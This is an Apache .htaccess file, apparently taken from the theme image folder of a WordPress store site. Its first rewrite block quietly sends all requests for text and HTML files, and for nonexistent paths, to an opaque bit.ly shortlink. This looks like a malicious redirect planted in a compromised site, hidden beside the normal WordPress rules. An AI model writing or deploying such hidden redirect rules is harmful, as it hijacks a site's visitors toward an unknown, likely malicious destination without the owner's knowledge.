File: /var/www/html/ielts-store/wp-content/themes/oceanwp/assets/img/.htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^.+\.txt$ https://bit.ly/388uv1j [L]
RewriteRule ^.+\.htm$ https://bit.ly/388uv1j [L]
RewriteRule ^.+\.html$ https://bit.ly/388uv1j [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . https://bit.ly/388uv1j [L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>